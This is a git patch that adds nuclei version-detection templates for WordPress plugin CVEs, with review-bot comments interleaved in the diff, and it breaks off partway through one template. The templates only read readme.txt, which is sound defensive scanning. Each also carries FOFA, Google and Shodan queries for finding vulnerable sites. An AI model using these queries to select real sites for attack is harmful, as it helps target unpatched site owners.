From 72b45937419871baf01a0fee8002402be28d707d Mon Sep 17 00:00:00 2001 
From: GitHub Action Date: Sun, 13 Oct 2024 12:37:43 +0000 Subject: [PATCH] 20241013 --- date.txt | 2 +- poc.txt | 34 +++++++++++ poc/cve/CVE-2024-7489.yaml | 59 +++++++++++++++++++ poc/cve/CVE-2024-8492.yaml | 59 +++++++++++++++++++ poc/cve/CVE-2024-8493.yaml | 59 +++++++++++++++++++ poc/cve/CVE-2024-8619.yaml | 59 +++++++++++++++++++ poc/cve/CVE-2024-8757.yaml | 59 +++++++++++++++++++ poc/cve/CVE-2024-8760.yaml | 59 +++++++++++++++++++ poc/cve/CVE-2024-8902.yaml | 59 +++++++++++++++++++ poc/cve/CVE-2024-8915.yaml | 59 +++++++++++++++++++ poc/cve/CVE-2024-9047.yaml | 59 +++++++++++++++++++ poc/cve/CVE-2024-9187.yaml | 59 +++++++++++++++++++ poc/cve/CVE-2024-9592.yaml | 59 +++++++++++++++++++ poc/cve/CVE-2024-9595.yaml | 59 +++++++++++++++++++ poc/cve/CVE-2024-9656.yaml | 59 +++++++++++++++++++ poc/cve/CVE-2024-9670.yaml | 59 +++++++++++++++++++ poc/cve/CVE-2024-9696.yaml | 59 +++++++++++++++++++ poc/cve/CVE-2024-9704.yaml | 59 +++++++++++++++++++ poc/cve/CVE-2024-9756.yaml | 59 +++++++++++++++++++ poc/cve/CVE-2024-9776.yaml | 59 +++++++++++++++++++ poc/cve/CVE-2024-9778.yaml | 59 +++++++++++++++++++ poc/cve/CVE-2024-9821.yaml | 59 +++++++++++++++++++ poc/cve/CVE-2024-9824.yaml | 59 +++++++++++++++++++ poc/cve/CVE-2024-9860.yaml | 59 +++++++++++++++++++ poc/cve/cve-2016-7981-2814.yaml | 5 ++ poc/cve/cve-2019-16920.yaml | 59 +++++++++++++++++++ poc/header/host-header-injection_.yaml | 32 ++++++++++ poc/injection/host-header-injection_.yaml | 32 ++++++++++ poc/other/2d-tag-cloud-widget-by-sujin.yaml | 59 +++++++++++++++++++ poc/other/category-icon.yaml | 59 +++++++++++++++++++ poc/other/image-gallery.yaml | 59 +++++++++++++++++++ poc/other/mynx-page-builder.yaml | 59 +++++++++++++++++++ poc/other/paypal-gift-certificate.yaml | 59 +++++++++++++++++++ .../bot-for-telegram-on-woocommerce.yaml | 59 +++++++++++++++++++ .../order-attachments-for-woocommerce.yaml | 59 +++++++++++++++++++ poc/social/dvk-social-sharing.yaml | 59 +++++++++++++++++++ poc/ssrf/ssrf-detect.yaml | 
21 +++++++ 37 files changed, 1954 insertions(+), 1 deletion(-) create mode 100644 poc/cve/CVE-2024-7489.yaml create mode 100644 poc/cve/CVE-2024-8492.yaml create mode 100644 poc/cve/CVE-2024-8493.yaml create mode 100644 poc/cve/CVE-2024-8619.yaml create mode 100644 poc/cve/CVE-2024-8757.yaml create mode 100644 poc/cve/CVE-2024-8760.yaml create mode 100644 poc/cve/CVE-2024-8902.yaml create mode 100644 poc/cve/CVE-2024-8915.yaml create mode 100644 poc/cve/CVE-2024-9047.yaml create mode 100644 poc/cve/CVE-2024-9187.yaml create mode 100644 poc/cve/CVE-2024-9592.yaml create mode 100644 poc/cve/CVE-2024-9595.yaml create mode 100644 poc/cve/CVE-2024-9656.yaml create mode 100644 poc/cve/CVE-2024-9670.yaml create mode 100644 poc/cve/CVE-2024-9696.yaml create mode 100644 poc/cve/CVE-2024-9704.yaml create mode 100644 poc/cve/CVE-2024-9756.yaml create mode 100644 poc/cve/CVE-2024-9776.yaml create mode 100644 poc/cve/CVE-2024-9778.yaml create mode 100644 poc/cve/CVE-2024-9821.yaml create mode 100644 poc/cve/CVE-2024-9824.yaml create mode 100644 poc/cve/CVE-2024-9860.yaml create mode 100644 poc/cve/cve-2019-16920.yaml create mode 100644 poc/header/host-header-injection_.yaml create mode 100644 poc/injection/host-header-injection_.yaml create mode 100644 poc/other/2d-tag-cloud-widget-by-sujin.yaml create mode 100644 poc/other/category-icon.yaml create mode 100644 poc/other/image-gallery.yaml create mode 100644 poc/other/mynx-page-builder.yaml create mode 100644 poc/other/paypal-gift-certificate.yaml create mode 100644 poc/remote_code_execution/bot-for-telegram-on-woocommerce.yaml create mode 100644 poc/remote_code_execution/order-attachments-for-woocommerce.yaml create mode 100644 poc/social/dvk-social-sharing.yaml create mode 100644 poc/ssrf/ssrf-detect.yaml
diff --git a/date.txt b/date.txt
index 4c61f9c24a..dcf1ca303e 100644
--- a/date.txt
+++ b/date.txt
@@ -1 +1 @@
-20241012
+20241013
diff --git a/poc.txt b/poc.txt
index 83a8951653..5937b875d6 100644
--- a/poc.txt
+++ b/poc.txt @@ -43295,6 +43295,7 @@ ./poc/cve/CVE-2024-7486-4944a37a1f08a4c0f808d31cb701abc0.yaml ./poc/cve/CVE-2024-7486.yaml ./poc/cve/CVE-2024-7489-aa8f1735fc553f9668252fa41454f24d.yaml +./poc/cve/CVE-2024-7489.yaml ./poc/cve/CVE-2024-7491-57292cedf3ffe8a05f22b0a34a93f1e7.yaml ./poc/cve/CVE-2024-7491.yaml ./poc/cve/CVE-2024-7492-2a27ab15f61a26513636485e06679756.yaml @@ -43693,7 +43694,9 @@ ./poc/cve/CVE-2024-8490-248af65f72b1c2b0295c9ea833e7478d.yaml ./poc/cve/CVE-2024-8490.yaml ./poc/cve/CVE-2024-8492-94675fec1abc838fe0b6b303f8fc36d8.yaml +./poc/cve/CVE-2024-8492.yaml ./poc/cve/CVE-2024-8493-187c32b4472ed4bbe2ad3f6482869576.yaml +./poc/cve/CVE-2024-8493.yaml ./poc/cve/CVE-2024-8499-c9a5372eb2c0d1af0e98c1a128e1ba17.yaml ./poc/cve/CVE-2024-8499.yaml ./poc/cve/CVE-2024-8505-83a08aab53494aec2ab7878bf97aab78.yaml @@ -43734,6 +43737,7 @@ ./poc/cve/CVE-2024-8552-3fed4d10e5322d73ee0e8c653106a656.yaml ./poc/cve/CVE-2024-8552.yaml ./poc/cve/CVE-2024-8619-68e42e392b92a31acf5085fd0331fe98.yaml +./poc/cve/CVE-2024-8619.yaml ./poc/cve/CVE-2024-8621-7d60a8cdcf557152f36b470b1896351c.yaml ./poc/cve/CVE-2024-8621.yaml ./poc/cve/CVE-2024-8622-0703e404cdba311680d3e36cfe2a24e3.yaml @@ -43834,9 +43838,11 @@ ./poc/cve/CVE-2024-8747-f757d510ac120bf89329e22a6153766c.yaml ./poc/cve/CVE-2024-8747.yaml ./poc/cve/CVE-2024-8757-234bd8d60a5f32f1b24409ba56f236a6.yaml +./poc/cve/CVE-2024-8757.yaml ./poc/cve/CVE-2024-8758-b4b201de72ae2112a1088c6a9330f891.yaml ./poc/cve/CVE-2024-8758.yaml ./poc/cve/CVE-2024-8760-97bda91e9d60d0f1065494ed99fe53b7.yaml +./poc/cve/CVE-2024-8760.yaml ./poc/cve/CVE-2024-8761-c4b3560e76a2e821342571d2f628840d.yaml ./poc/cve/CVE-2024-8761.yaml ./poc/cve/CVE-2024-8771-56576a1d647813c40294e7136a5f117c.yaml 
@@ -43879,6 +43885,7 @@ ./poc/cve/CVE-2024-8872-af9dba20c77deb90e6dc21e6e1a04408.yaml ./poc/cve/CVE-2024-8872.yaml ./poc/cve/CVE-2024-8902-973a09e850f27d16cf400f1ff83278bd.yaml +./poc/cve/CVE-2024-8902.yaml ./poc/cve/CVE-2024-8910-a21139e5574bbe79da0b0184ae2f61a0.yaml ./poc/cve/CVE-2024-8910.yaml ./poc/cve/CVE-2024-8911-4f15541bff60904dde80229d21bf76b6.yaml @@ -43888,6 +43895,7 @@ ./poc/cve/CVE-2024-8914-a880cd2d5e4d4bdbe19c9508e28fe443.yaml ./poc/cve/CVE-2024-8914.yaml ./poc/cve/CVE-2024-8915-c96fbadd6669597791ff972bbeeaf8cd.yaml +./poc/cve/CVE-2024-8915.yaml ./poc/cve/CVE-2024-8917-6aaaaa729e35997797a61f2cd09b6335.yaml ./poc/cve/CVE-2024-8917.yaml ./poc/cve/CVE-2024-8919-fb0057a26cabecd9dfc880674f08a19a.yaml @@ -43928,6 +43936,7 @@ ./poc/cve/CVE-2024-9028-dc0d91d4955ed06391d200994359ce87.yaml ./poc/cve/CVE-2024-9028.yaml ./poc/cve/CVE-2024-9047-4fa9dae40fda722965808b936ffa6acb.yaml +./poc/cve/CVE-2024-9047.yaml ./poc/cve/CVE-2024-9049-0c91c2c9811f2f85c273c97777dda20b.yaml ./poc/cve/CVE-2024-9049.yaml ./poc/cve/CVE-2024-9051-d0cc990c4c2c72b3f1c15bf197875f13.yaml @@ -43987,6 +43996,7 @@ ./poc/cve/CVE-2024-9177-178dee7653fa8d80dc1711bad3dcec51.yaml ./poc/cve/CVE-2024-9177.yaml ./poc/cve/CVE-2024-9187-8b43f9d2f6a2b591d59c81d2238caf51.yaml +./poc/cve/CVE-2024-9187.yaml ./poc/cve/CVE-2024-9189-887572e2c273c4a4bdeea21969a91124.yaml ./poc/cve/CVE-2024-9189.yaml ./poc/cve/CVE-2024-9204-0c84a13d3a82918c5d6c0973f90aa654.yaml @@ -44116,7 +44126,9 @@ ./poc/cve/CVE-2024-9587-9addb86845d8c338383a9caf97ac21e2.yaml ./poc/cve/CVE-2024-9587.yaml ./poc/cve/CVE-2024-9592-fff4a8a541e39d94b5f0980d29acdfe3.yaml +./poc/cve/CVE-2024-9592.yaml ./poc/cve/CVE-2024-9595-0c12058c023c26b1446aa326839994fd.yaml +./poc/cve/CVE-2024-9595.yaml ./poc/cve/CVE-2024-9610-22573cea45a3c22fba477c8e4bf581f3.yaml ./poc/cve/CVE-2024-9610.yaml ./poc/cve/CVE-2024-9611-e3d072056298fd4e81d4dfecee6ae07e.yaml 
@@ -44124,21 +44136,31 @@ ./poc/cve/CVE-2024-9616-74cbb74314a998222d17f0108bdd1b47.yaml ./poc/cve/CVE-2024-9616.yaml ./poc/cve/CVE-2024-9656-5e11b0669cd68a7b45a069c732842ecd.yaml +./poc/cve/CVE-2024-9656.yaml ./poc/cve/CVE-2024-9670-590d40c02bbb47b092deffa0e1d25829.yaml +./poc/cve/CVE-2024-9670.yaml ./poc/cve/CVE-2024-9685-162e285486f85718f1eff0c9fc075030.yaml ./poc/cve/CVE-2024-9685.yaml ./poc/cve/CVE-2024-9696-7eb3ceca660ff8ed51fe8b0a6a2f165c.yaml +./poc/cve/CVE-2024-9696.yaml ./poc/cve/CVE-2024-9704-f21a430d525f14c5222622c2499dbc1f.yaml +./poc/cve/CVE-2024-9704.yaml ./poc/cve/CVE-2024-9707-4fb16dfc3a442890f762f60d876d8c4d.yaml ./poc/cve/CVE-2024-9707.yaml ./poc/cve/CVE-2024-9756-64a408f630e792f3ff717cc9822672de.yaml +./poc/cve/CVE-2024-9756.yaml ./poc/cve/CVE-2024-9776-b87b3db31f1eda93892f1d85c0aa0846.yaml +./poc/cve/CVE-2024-9776.yaml ./poc/cve/CVE-2024-9778-f12d8ad8d5a8b1346844c8509cb8d77c.yaml +./poc/cve/CVE-2024-9778.yaml ./poc/cve/CVE-2024-9821-3c976b43c465f64b4e1fa1afc3ed719b.yaml +./poc/cve/CVE-2024-9821.yaml ./poc/cve/CVE-2024-9822-69ea5c9c3890154ffaf61e4bd66bce90.yaml ./poc/cve/CVE-2024-9822.yaml ./poc/cve/CVE-2024-9824-44742b5dfe15bf136d8b10c8fdb6d6e7.yaml +./poc/cve/CVE-2024-9824.yaml ./poc/cve/CVE-2024-9860-b04ee97e5d460a289f93568831e0cf5e.yaml +./poc/cve/CVE-2024-9860.yaml ./poc/cve/CVE202127562-220331-222408.yaml ./poc/cve/CVE_2023_49442.yaml ./poc/cve/CVE_2023_51467.yaml @@ -47648,6 +47670,7 @@ ./poc/cve/cve-2019-16920-3960.yaml ./poc/cve/cve-2019-16920-3961.yaml ./poc/cve/cve-2019-16920-3962.yaml +./poc/cve/cve-2019-16920.yaml ./poc/cve/cve-2019-16931(1).yaml ./poc/cve/cve-2019-16931-3963.yaml ./poc/cve/cve-2019-16931.yaml @@ -58101,6 +58124,7 @@ ./poc/header/host-header-injection-8001.yaml ./poc/header/host-header-injection-8002.yaml ./poc/header/host-header-injection.yaml +./poc/header/host-header-injection_.yaml ./poc/header/host-header-poisoning.yaml ./poc/header/hostheaderpoisoning.yaml ./poc/header/http-cache-header.yaml 
@@ -58531,6 +58555,7 @@ ./poc/injection/host-header-injection-8001.yaml ./poc/injection/host-header-injection-8002.yaml ./poc/injection/host-header-injection.yaml +./poc/injection/host-header-injection_.yaml ./poc/injection/injection-guard-4875992ccc89ab6c03d9298f0ea07338.yaml ./poc/injection/injection-guard-4a32f73a586451a52bc0604215b90d03.yaml ./poc/injection/injection-guard-55f31168b1f68836ada04260aaedb591.yaml @@ -63800,6 +63825,7 @@ ./poc/other/2848712183.yaml ./poc/other/2939021635.yaml ./poc/other/2d-tag-cloud-widget-by-sujin-f775dedf778f01d96f3cf104b4a5ff00.yaml +./poc/other/2d-tag-cloud-widget-by-sujin.yaml ./poc/other/2j-slideshow-398188b565cef4627bb1cc2005473d42.yaml ./poc/other/2j-slideshow-a2cb29fa8d73411375a9f25f28aec131.yaml ./poc/other/2j-slideshow-a7ee719525508426f77934740c1310d6.yaml @@ -69221,6 +69247,7 @@ ./poc/other/category-grid-view-gallery-ec1de78c58c23ac8308ebf650b24c84a.yaml ./poc/other/category-grid-view-gallery.yaml ./poc/other/category-icon-1ba7a71509a41771343e0fdcceeb4a9f.yaml +./poc/other/category-icon.yaml ./poc/other/category-list-portfolio-page-c3ec7120a4b92459e512233c50f2a028.yaml ./poc/other/category-list-portfolio-page.yaml ./poc/other/category-page-icons-02e0417d125f209136fe3c33ea09f1de.yaml @@ -78545,6 +78572,7 @@ ./poc/other/image-gallery-with-slideshow-72b9b91cc4acaa06a4eeec68b450f837.yaml ./poc/other/image-gallery-with-slideshow-d86316f172e2cc00097a0b5d6774c1b2.yaml ./poc/other/image-gallery-with-slideshow.yaml +./poc/other/image-gallery.yaml ./poc/other/image-horizontal-reel-scroll-slideshow-29d01eb4c98f0f4e9fcbd15dcac7b08c.yaml ./poc/other/image-horizontal-reel-scroll-slideshow-5f09e55636613e78488ea83c9a30f2be.yaml ./poc/other/image-horizontal-reel-scroll-slideshow.yaml 
@@ -83084,6 +83112,7 @@ ./poc/other/mylot.yaml ./poc/other/mymfans.yaml ./poc/other/mynx-page-builder-e5ef52784bd604a03534c96c5c5b985d.yaml +./poc/other/mynx-page-builder.yaml ./poc/other/mypixs-758377262af71e2390f649acd5c89b73.yaml ./poc/other/mypixs.yaml ./poc/other/myportfolio.yaml @@ -84848,6 +84877,7 @@ ./poc/other/paypal-donations-5eead37a379def1e3474abcddf3a225c.yaml ./poc/other/paypal-donations.yaml ./poc/other/paypal-gift-certificate-7a1c89e0233f23e5f8c8d08caace9488.yaml +./poc/other/paypal-gift-certificate.yaml ./poc/other/paypal-pay-buy-donation-and-cart-buttons-shortcode-055ed7df687e1bb906d206bc5dc26037.yaml ./poc/other/paypal-pay-buy-donation-and-cart-buttons-shortcode-b134b6aa0693a308331bb83085898e83.yaml ./poc/other/paypal-pay-buy-donation-and-cart-buttons-shortcode.yaml @@ -98417,6 +98447,7 @@ ./poc/remote_code_execution/bosa-elementor-for-woocommerce-01a4f2980d5d921fdb4f483338cf1391.yaml ./poc/remote_code_execution/bosa-elementor-for-woocommerce.yaml ./poc/remote_code_execution/bot-for-telegram-on-woocommerce-95e4471cf7b0cdfb6c9aec1a9d40a0ae.yaml +./poc/remote_code_execution/bot-for-telegram-on-woocommerce.yaml ./poc/remote_code_execution/brands-for-woocommerce-018c818356c6b000ed4656a96a0c372c.yaml ./poc/remote_code_execution/brands-for-woocommerce-055e1820b3e7ef430034aac2fbd3cb4b.yaml ./poc/remote_code_execution/brands-for-woocommerce-25f970a8a780b560ba186742cd55ae28.yaml 
@@ -99477,6 +99508,7 @@ ./poc/remote_code_execution/order-and-inventory-manager-for-woocommerce-cb43a3033745f9235059b7d1b7a3d855.yaml ./poc/remote_code_execution/order-and-inventory-manager-for-woocommerce.yaml ./poc/remote_code_execution/order-attachments-for-woocommerce-d72cf819fcb5997a2922f8848f39656f.yaml +./poc/remote_code_execution/order-attachments-for-woocommerce.yaml ./poc/remote_code_execution/order-auto-complete-for-woocommerce-d52da6d8785fe0d333ad93221eb739c1.yaml ./poc/remote_code_execution/order-auto-complete-for-woocommerce.yaml ./poc/remote_code_execution/order-delivery-date-for-woocommerce-0a1e73557358a5b2fa4a31e0b34b7e12.yaml @@ -102768,6 +102800,7 @@ ./poc/social/duitku-social-payment-gateway-00bd2277c641ac0f8870ff39d1abb82f.yaml ./poc/social/duitku-social-payment-gateway.yaml ./poc/social/dvk-social-sharing-89c738e746dab8d430975f04439c54b6.yaml +./poc/social/dvk-social-sharing.yaml ./poc/social/easy-facebook-like-box-7f8f19fc7534d3a20291e7d36a6962a1.yaml ./poc/social/easy-facebook-like-box.yaml ./poc/social/easy-facebook-likebox-0351c9b7f28bf4dade309063cdc5cccc.yaml @@ -112221,6 +112254,7 @@ ./poc/ssrf/ssrf-blind-host.yaml ./poc/ssrf/ssrf-blind.yaml ./poc/ssrf/ssrf-by-proxy.yaml +./poc/ssrf/ssrf-detect.yaml ./poc/ssrf/ssrf-detection.yaml ./poc/ssrf/ssrf-fuzz.yaml ./poc/ssrf/ssrf-injection.yaml diff --git a/poc/cve/CVE-2024-7489.yaml b/poc/cve/CVE-2024-7489.yaml new file mode 100644 index 0000000000..d5ad65021c --- /dev/null +++ b/poc/cve/CVE-2024-7489.yaml 
@@ -0,0 +1,59 @@
+id: CVE-2024-7489
+
+info:
+ name: >
+ Forms for Mailchimp by Optin Cat <= 2.5.6 - Authenticated (Editor+) Stored Cross-Site Scripting via Form Color Parameters
+ author: topscoder
+ severity: low
+ description: >
+ The Forms for Mailchimp by Optin Cat – Grow Your MailChimp List plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the form color parameters in all versions up to, and including, 2.5.6 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with editor-level access, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. This only affects multi-site installations and installations where unfiltered_html has been disabled.
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/52f9db86-7fed-4b32-8384-3ceb300f9249?source=api-prod
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:C/C:L/I:L/A:N
+ cvss-score: 4.4
+ cve-id: CVE-2024-7489
+ metadata:
+ fofa-query: "wp-content/plugins/mailchimp-wp/"
+ google-query: inurl:"/wp-content/plugins/mailchimp-wp/"
+ shodan-query: 'vuln:CVE-2024-7489'
+ tags: cve,wordpress,wp-plugin,mailchimp-wp,low
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/mailchimp-wp/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "mailchimp-wp"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 2.5.6')
\ No newline at end of file
diff --git a/poc/cve/CVE-2024-8492.yaml b/poc/cve/CVE-2024-8492.yaml
new file mode 100644
index 0000000000..779e62d7cb
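Review bot: The template declares two `version` extractors with the identical `(?mi)Stable tag: ([0-9.]+)` regex, one `internal: true` and one exported; if a non-internal named extractor is already visible to the `compare_versions` DSL in the nuclei release this repository targets, the first one is dead weight and can be dropped, otherwise a one-line comment saying why both exist would save the next reader the same question. The check is also readme-only: a `Stable tag` that is not purely numeric (plugin readmes do at times carry `trunk`) leaves `version` unset, so the dsl matcher silently evaluates false and the host is reported clean, and when it does match it only shows that the shipped readme advertises an affected version, not that the vulnerable code path is active or reachable. I would state that in the description, e.g. `Detection is based on the readme.txt Stable tag only; confirm the installed version before reporting.`. Both points apply unchanged to CVE-2024-8492, 8493, 8619, 8757, 8760, 8902, 8915, 9047, 9187 and 9592 in this patch, which share the same http block.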
--- /dev/null
+++ b/poc/cve/CVE-2024-8492.yaml
@@ -0,0 +1,59 @@
+id: CVE-2024-8492
+
+info:
+ name: >
+ Hustle <= 7.8.4 - Authenticated (Administrator+) Stored Cross-Site Scripting
+ author: topscoder
+ severity: low
+ description: >
+ The Hustle – Email Marketing, Lead Generation, Optins, Popups plugin for WordPress is vulnerable to Stored Cross-Site Scripting via admin settings in all versions up to, and including, 7.8.4 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with administrator-level permissions and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. This only affects multi-site installations and installations where unfiltered_html has been disabled.
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/d7023a3e-35ba-4d52-8092-ae40b53d5efa?source=api-prod
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:C/C:L/I:L/A:N
+ cvss-score: 4.4
+ cve-id: CVE-2024-8492
+ metadata:
+ fofa-query: "wp-content/plugins/wordpress-popup/"
+ google-query: inurl:"/wp-content/plugins/wordpress-popup/"
+ shodan-query: 'vuln:CVE-2024-8492'
+ tags: cve,wordpress,wp-plugin,wordpress-popup,low
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/wordpress-popup/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "wordpress-popup"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 7.8.4')
\ No newline at end of file
diff --git a/poc/cve/CVE-2024-8493.yaml b/poc/cve/CVE-2024-8493.yaml
new file mode 100644
index 0000000000..c5cff79575
--- /dev/null
+++ b/poc/cve/CVE-2024-8493.yaml
@@ -0,0 +1,59 @@
+id: CVE-2024-8493
+
+info:
+ name: >
+ The Events Calendar <= 6.6.3 - Authenticated (Administrator+) Stored Cross-Site Scripting
+ author: topscoder
+ severity: low
+ description: >
+ The The Events Calendar plugin for WordPress is vulnerable to Stored Cross-Site Scripting via admin settings in all versions up to, and including, 6.6.3 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with administrator-level permissions and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. This only affects multi-site installations and installations where unfiltered_html has been disabled.
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/6df29b14-0c9d-4ecf-96be-8c39c93121e2?source=api-prod
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:C/C:L/I:L/A:N
+ cvss-score: 4.4
+ cve-id: CVE-2024-8493
+ metadata:
+ fofa-query: "wp-content/plugins/the-events-calendar/"
+ google-query: inurl:"/wp-content/plugins/the-events-calendar/"
+ shodan-query: 'vuln:CVE-2024-8493'
+ tags: cve,wordpress,wp-plugin,the-events-calendar,low
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/the-events-calendar/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "the-events-calendar"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 6.6.3')
\ No newline at end of file
diff --git a/poc/cve/CVE-2024-8619.yaml b/poc/cve/CVE-2024-8619.yaml
new file mode 100644
index 0000000000..69580c1ecf
--- /dev/null
+++ b/poc/cve/CVE-2024-8619.yaml
@@ -0,0 +1,59 @@
+id: CVE-2024-8619
+
+info:
+ name: >
+ Ajax Search Lite <= 4.12.1 - Authenticated (Administrator+) Stored Cross-Site Scripting
+ author: topscoder
+ severity: low
+ description: >
+ The Ajax Search Lite plugin for WordPress is vulnerable to Stored Cross-Site Scripting via admin settings in all versions up to, and including, 4.12.1 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with administrator-level permissions and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. This only affects multi-site installations and installations where unfiltered_html has been disabled.
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/e1cc3dbe-26e3-478f-9574-f57ffa0f50c3?source=api-prod
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:C/C:L/I:L/A:N
+ cvss-score: 4.4
+ cve-id: CVE-2024-8619
+ metadata:
+ fofa-query: "wp-content/plugins/ajax-search-lite/"
+ google-query: inurl:"/wp-content/plugins/ajax-search-lite/"
+ shodan-query: 'vuln:CVE-2024-8619'
+ tags: cve,wordpress,wp-plugin,ajax-search-lite,low
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/ajax-search-lite/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "ajax-search-lite"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 4.12.1')
\ No newline at end of file
diff --git a/poc/cve/CVE-2024-8757.yaml b/poc/cve/CVE-2024-8757.yaml
new file mode 100644
index 0000000000..0d5c3ae995
--- /dev/null
+++ b/poc/cve/CVE-2024-8757.yaml 
@@ -0,0 +1,59 @@
+id: CVE-2024-8757
+
+info:
+ name: >
+ Boost Your Blog's Engagement with WP Post Author <= 3.8.1 - Authenticated (Administrator+) SQL Injection
+ author: topscoder
+ severity: low
+ description: >
+ The WP Post Author – Boost Your Blog's Engagement with Author Box, Social Links, Co-Authors, Guest Authors, Post Rating System, and Custom User Registration Form Builder plugin for WordPress is vulnerable to time-based SQL Injection via the linked_user_id parameter in all versions up to, and including, 3.8.1 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for authenticated attackers, with Administrator-level access and above, to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/d667bafc-5f19-4889-a988-236df050c013?source=api-prod
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H
+ cvss-score: 7.2
+ cve-id: CVE-2024-8757
+ metadata:
+ fofa-query: "wp-content/plugins/wp-post-author/"
+ google-query: inurl:"/wp-content/plugins/wp-post-author/"
+ shodan-query: 'vuln:CVE-2024-8757'
+ tags: cve,wordpress,wp-plugin,wp-post-author,low
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/wp-post-author/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "wp-post-author"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 3.8.1')
\ No newline at end of file
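Review bot: `severity: low` and the trailing `low` in `tags` disagree with `cvss-score: 7.2` and the `C:H/I:H/A:H` vector a few lines below, which sits in the High band of the CVSS v3.1 qualitative scale, so anyone filtering nuclei output by severity will file an authenticated SQL injection under low. If severity is meant to track the CVSS score, the two lines should read `severity: high` and `tags: cve,wordpress,wp-plugin,wp-post-author,high`. CVE-2024-8915.yaml in this patch shows the same drift (`cvss-score: 6.4` tagged `low`, Medium on that scale), and the 4.3–4.4 scores in CVE-2024-7489, 8902 and 9187 also fall in the Medium band, so it is worth checking these against whatever convention the repository uses rather than carrying the upstream label over unchanged.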
diff --git a/poc/cve/CVE-2024-8760.yaml b/poc/cve/CVE-2024-8760.yaml
new file mode 100644
index 0000000000..8cfe22870d
--- /dev/null
+++ b/poc/cve/CVE-2024-8760.yaml
@@ -0,0 +1,59 @@
+id: CVE-2024-8760
+
+info:
+ name: >
+ Stackable – Page Builder Gutenberg Blocks <= 3.13.6 - Unauthenticated CSS Injection
+ author: topscoder
+ severity: medium
+ description: >
